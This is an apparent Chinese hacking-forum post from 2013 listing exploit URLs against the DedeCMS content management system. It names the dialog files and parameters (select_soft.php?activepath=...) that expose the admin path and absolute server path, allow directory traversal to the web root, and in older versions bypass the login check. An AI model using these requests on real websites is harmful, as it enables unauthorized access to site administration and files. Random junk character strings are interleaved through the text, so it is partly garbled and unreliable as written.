1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
, j' K1 K4 V$ a1 _& H5 A
0 S. I O3 [. u2 s' {* C8 Z) s! E员帐号,新版本的就直接转向了后台.
0 w+ K# \% R$ I2 ~# I* g7 u& d- \( c
2.include/dialog/config.php会爆出后台管理路径
; {4 V+ `# u2 b+ n% i& o7 D5 w( y. }: G$ ~9 z- s
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
+ @) x0 D% u4 N* P! P1 I% r$ s- N" K
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.' |8 y: K u( }: l9 Y2 T
( }* u& f7 u6 l. C1 ~1 F. [' Q5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉3 g" r4 T9 t) p k' D
& F+ E1 Z0 b) k {
到根目录去.不过这些版本的访问地址有些不同.; W( p6 l$ a: b
地址为require/dialog/select_soft.php?activepath=/././././././././, @( J- k' L, `' T8 Y$ p( M3 I
' Y2 u( Q' X; U! C8 ~/ L0 a# N
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
+ W) m h% u1 W& D存在相同问题的文件还有
/ K' `7 y4 q1 \6 D, E( R2 zinclude\dialog\select_images.php
7 q! T- o+ l: X( F/ d- x# s5 R) }5 [include\dialog\select_media.php
! Q% T+ X* F2 [) `5 ?include\dialog\select_templets.php3 w; j9 o2 U5 Y2 K
|
发表于 2013-4-16 16:50:43
收藏
支持
反对